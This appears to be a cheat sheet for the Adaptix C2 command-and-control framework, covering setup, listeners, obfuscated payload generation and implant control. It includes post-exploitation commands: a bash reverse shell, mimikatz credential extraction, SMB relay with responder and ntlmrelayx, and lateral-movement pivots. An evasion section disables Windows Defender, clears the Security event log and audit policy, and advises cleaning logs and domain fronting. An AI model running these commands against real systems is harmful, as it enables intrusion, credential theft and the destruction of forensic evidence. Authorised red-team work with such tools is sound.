Adaptix C2 is a modern, open-source command and control (C2) framework designed for red team operations and post-exploitation activities. It features a comprehensive web graphical user interface (GUI), sophisticated implant management capabilities, and built-in team collaboration tools. Adaptix is actively maintained and emphasizes modularity, extensibility, and operator ease-of-use. It supports multiple payload types, listener configurations, and advanced post-exploitation workflows.
# System requirements
- Linux (Ubuntu 20.04+ recommended)
- Docker and Docker Compose (optional but recommended)
- Python 3.9+
- Node.js 14+ for frontend
- PostgreSQL or SQLite for database
# Clone repository
git clone https://github.com/adaptix/c2.git
cd c2
# Install backend dependencies
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
# Install frontend dependencies
cd frontend
npm install
npm run build
cd ..
# Initialize database
python manage.py migrate
python manage.py createsuperuser
# Create required directories
mkdir -p logs uploads payloads listeners
chmod 700 logs uploads payloads listeners
# Clone repository
git clone https://github.com/adaptix/c2.git
cd c2
# Build Docker images
docker-compose build
# Start services
docker-compose up -d
# Initialize database
docker-compose exec web python manage.py migrate
docker-compose exec web python manage.py createsuperuser
# Access at https://localhost:8000
# Edit main configuration
cp .env.example .env
nano .env
# Critical settings:
SECRET_KEY=<generate-random-key>
DEBUG=false
ALLOWED_HOSTS=localhost,127.0.0.1,yourdomain.com
DATABASE_URL=postgresql://user:pass@db:5432/adaptix
REDIS_URL=redis://redis:6379/0
# Generate Django secret key
python -c "from django.core.management.utils import get_random_secret_key; print(get_random_secret_key())"
# Backend server
python manage.py runserver 0.0.0.0:8000
# Frontend development server (separate terminal)
cd frontend
npm start
# Access at http://localhost:3000
# Using Gunicorn
gunicorn --workers 4 --bind 0.0.0.0:8000 adaptix.wsgi:application
# Using Docker
docker-compose -f docker-compose.prod.yml up -d
# With SSL/TLS
# Configure reverse proxy (Nginx/Apache) with SSL certificates
# Create service file
sudo nano /etc/systemd/system/adaptix.service
[Unit]
Description=Adaptix C2 Framework
After=network.target
[Service]
User=adaptix
WorkingDirectory=/opt/adaptix
Environment="PATH=/opt/adaptix/venv/bin"
ExecStart=/opt/adaptix/venv/bin/gunicorn --workers 4 --bind 0.0.0.0:8000 adaptix.wsgi:application
Restart=always
[Install]
WantedBy=multi-user.target
# Enable service
sudo systemctl daemon-reload
sudo systemctl enable adaptix
sudo systemctl start adaptix
Dashboard
├── Home (Statistics, Recent Activity)
├── Listeners (Create, Manage Listeners)
├── Implants (View, Control Agents)
├── Payloads (Generate, Manage Payloads)
├── Tasks (Monitor, Manage Operations)
├── Users (Team Management)
├── Sessions (Active Connections)
└── Settings (Configuration)
Administrator - Full access, user/team management
Operator - Full C2 operations, team restricted
Viewer - Read-only access, monitoring only
Web UI Path: Listeners → New Listener
Name: HTTP-Listener-80
Type: HTTP
Protocol: HTTP
Host: 0.0.0.0
Port: 80
SSL/TLS: Disabled
Jitter: 5-15 seconds
Callback Path: /api/agent
Name: HTTPS-Listener-443
Type: HTTPS
Protocol: HTTPS
Host: 0.0.0.0
Port: 443
SSL/TLS: Enabled
Certificate: /path/to/certificate.crt
Private Key: /path/to/private.key
Jitter: 3-10 seconds
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Name: DNS-Listener
Type: DNS
Protocol: DNS
Domain: c2.example.com
DNS Server: 0.0.0.0
Port: 53
Record Type: A or TXT
TTL: 300
Jitter: 10-30 seconds
Name: SMB-Listener
Type: SMB
Protocol: SMB
Named Pipe: \\\\.\\pipe\\adaptix
Jitter: 5-15 seconds
Web UI Path: Payloads → New Payload
Payload Type: Windows EXE
Format: x86 or x64
Listener: HTTP-Listener-80
Obfuscation: Enabled
Proxy: None
Encoding: XOR Base64
Output Format: exe
Payload Type: PowerShell
Version: 2.0 or 5.0
Listener: HTTPS-Listener-443
Proxy: System Proxy
Encoding: Base64
Output: One-liner or Script
Payload Type: Python
Version: 3.6+
Listener: HTTP-Listener-80
Encoding: Base64
Output Format: .py or .pex
Payload Type: ELF
Architecture: x86 or x64
Listener: HTTP-Listener-80
Format: Shared Object or Executable
Encoding: Base64
Payload Type: Mach-O
Architecture: Universal or x86_64
Listener: HTTPS-Listener-443
Format: Executable or Dylib
Code Signing: Optional
Web UI Path: Implants → Active Agents
| Field | Description |
|---|
| Agent ID | Unique identifier for implant |
| Hostname | Compromised system name |
| Username | Logged-in user |
| IP Address | Internal/External IP |
| Process ID | Running process identifier |
| Architecture | x86 or x64 |
| OS Version | Operating system information |
| Last Checkin | Last communication timestamp |
| Status | Active, Inactive, or Dead |
Filter Options:
- Hostname: Contains "DC"
- OS: Windows, Linux, macOS
- Listener: HTTPS-Listener-443
- Status: Active only
- Username: Contains "admin"
- Last Checkin: Last 24 hours
Select Implant → Tasks → Shell
# Execute command
whoami
ipconfig
netstat -an
tasklist /v
Get-Process
Implant Menu → File Operations
| Operation | Description |
|---|
download /path/file.txt | Download file from target |
upload ./payload.exe C:\Windows\Temp\ | Upload to target |
ls /home/user/ | List directory (Linux/macOS) |
dir C:\Users\ | List directory (Windows) |
mkdir /tmp/tools | Create directory |
rm /tmp/file.txt | Delete file (Linux/macOS) |
del C:\Temp\file.txt | Delete file (Windows) |
Implant Menu → Process Management
# List processes
ps aux # Linux/macOS
Get-Process # PowerShell
# Kill process
kill 1234 # Linux/macOS
Stop-Process -Id 1234 # PowerShell
# Start process
./binary & # Linux/macOS background
Start-Process notepad.exe # PowerShell
Implant Menu → Privilege Escalation
# Check current privileges
whoami /groups # Windows
id # Linux/macOS
sudo -l # Check sudo permissions
# Execute as different user (Windows)
runas /user:DOMAIN\admin cmd.exe
# Kerberos ticket abuse (Windows)
mimikatz # kerberos::ask /target:user@domain
# Privilege escalation (Linux)
sudo -u root /bin/bash
Implant Menu → Lateral Movement
# Discover accessible hosts
nmap -p 3389,22,445 10.0.0.0/24
# Create reverse shell to another host
bash -i >& /dev/tcp/10.0.0.10/4444 0>&1
# SMB relay attack
responder -I eth0
ntlmrelayx.py -t 10.0.0.100 -c 'whoami'
# RDP pivot
xfreerdp /v:10.0.0.100 /u:admin /p:password
# SSH pivot
ssh -N -D 1080 user@10.0.0.100
proxychains nmap 10.0.0.200
Payloads → Generate Staged Payload
Stage 1: Lightweight stager
Stage 2: Full implant functionality
Stage 3: Post-exploitation modules
Proxy Type: HTTP, SOCKS4, SOCKS5
Address: proxy.internal.com
Port: 3128
Username: domain\user
Password: ****
Create staging listener on compromised system
Redirect traffic to internal C2 server
Isolate internal infrastructure from external exposure
| Module | Description |
|---|
mimikatz | Windows credential extraction |
bloodhound | Active Directory enumeration |
powersploit | PowerShell post-exploitation |
impacket | Network protocol tools |
enum4linux | SMB enumeration |
linpeas | Linux privilege escalation |
winpeas | Windows privilege escalation |
adexplorer | AD structure mapping |
sharphound | Bloodhound collector |
hashcat | Password cracking |
# Create module file
nano modules/custom_module.py
# Register module
python manage.py register_module modules/custom_module.py
# Deploy to implant
Implant → Load Module → custom_module
Settings → User Management
Create User:
Username: red_operator
Email: operator@example.com
Role: Operator
Teams: [Team Alpha, Team Bravo]
Assign Permissions:
- Create Listeners
- Generate Payloads
- Control Implants
- View Reports
Dashboard → Team Workspace
| Feature | Capability |
|---|
| Shared Listeners | Team-wide listener management |
| Shared Payloads | Payload library and distribution |
| Task Comments | Collaborative task documentation |
| Activity Log | Team operation timeline |
| Reports | Shared findings and results |
Implant → Notes
Enter operation notes visible to team members
Task → Comments
Add findings and instructions for team review
Settings → Logs → Activity Log
Filters:
- User: username
- Action: Login, Payload Generated, Task Executed
- Implant: agent_id
- Time Range: Custom dates
Implant → Logs
- Command execution history
- Output captured
- Errors and warnings
- Traffic analysis
Reports → New Report
Report Type: Executive Summary, Technical Analysis, Timeline
Date Range: Start to End
Implants: Selected agents
Include:
- Command execution summary
- File transfers
- Credentials harvested
- Network reconnaissance
- Privilege escalation timeline
# Obtain API token
curl -X POST https://c2.example.com/api/auth/token \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":"password"}'
# Response
{
"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
"user_id": 1,
"username": "admin"
}
| Endpoint | Method | Description |
|---|
/api/v1/agents | GET | List all agents |
/api/v1/agents/{id} | GET | Get agent details |
/api/v1/tasks | POST | Create task |
/api/v1/tasks/{id} | GET | Get task status |
/api/v1/listeners | GET | List listeners |
/api/v1/payloads | POST | Generate payload |
/api/v1/sessions | GET | List sessions |
# List all active implants
curl -H "Authorization: Bearer $TOKEN" \
https://c2.example.com/api/v1/agents?status=active
# Execute command on implant
curl -X POST https://c2.example.com/api/v1/tasks \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"agent_id": "abc123",
"command": "whoami",
"task_type": "shell"
}'
# Generate payload
curl -X POST https://c2.example.com/api/v1/payloads \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"payload_type": "windows_exe",
"listener_id": 1,
"obfuscation": true
}'
# adaptix/config/encoding.yaml
encoders:
xor:
key_size: 32
iterations: 3
base64:
iterations: 2
custom:
method: rc4
key_derivation: pbkdf2
# adaptix/config/profiles.yaml
profiles:
stealth:
jitter: 30-60
beacon_size: 512
user_agent: Mozilla/5.0 (Windows NT 10.0)
aggressive:
jitter: 1-5
beacon_size: 4096
user_agent: Custom/1.0
# Generate self-signed certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
# Import certificate to listener
Listeners → HTTPS-Listener → Upload Certificate
# Use LetsEncrypt (recommended for realism)
certbot certonly --standalone -d c2.example.com
| Issue | Solution |
|---|
| Implants not checking in | Verify listener is running, firewall rules, network connectivity |
| Database connection errors | Check DATABASE_URL, PostgreSQL running, credentials |
| SSL certificate errors | Regenerate certificate, verify domain, update listener config |
| API authentication fails | Check token expiry, regenerate token, verify permissions |
| Payload generation timeout | Increase timeout value, reduce obfuscation, check disk space |
# Enable debug logging
DEBUG=true python manage.py runserver
# Check logs
tail -f logs/adaptix.log
tail -f logs/web.log
# Database query logging
QUERY_LOG=true python manage.py runserver
# Test listener connectivity
nc -zv c2.example.com 80
nmap -p 443,80,53 c2.example.com
# Monitor implant traffic
tcpdump -i eth0 'port 80 or port 443'
wireshark
# Check firewall rules
sudo iptables -L -n
sudo ufw status
# Restrict web interface access
Configure reverse proxy IP whitelist
Implement VPN requirement
Enable two-factor authentication
Settings → Security → 2FA
- Use separate infrastructure for C2
- Implement domain fronting
- Vary beacon times and sizes
- Rotate listeners regularly
- Use different encoding per implant
- Monitor for blue team detection
- Clean logs regularly
# Disable Windows Defender
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
# Disable logging
wevtutil cl Security
auditpol /clear /y
# Alternative: disable via Group Policy
gpedit.msc → Computer Configuration → Administrative Templates
- Always maintain operational security
- Document all activities with timestamps
- Test payloads in isolated lab environment
- Rotate indicators of compromise (IOCs)
- Plan exit strategy before engagement
- Monitor blue team defensive actions
- Maintain multiple listener types
- Regular backup of database and configurations
# Backup critical data
tar -czf backup_$(date +%Y%m%d).tar.gz \
/opt/adaptix/db /opt/adaptix/payloads /opt/adaptix/logs
# Archive evidence
mkdir -p /evidence/$(date +%Y%m%d)
cp -r /opt/adaptix/logs /evidence/$(date +%Y%m%d)/
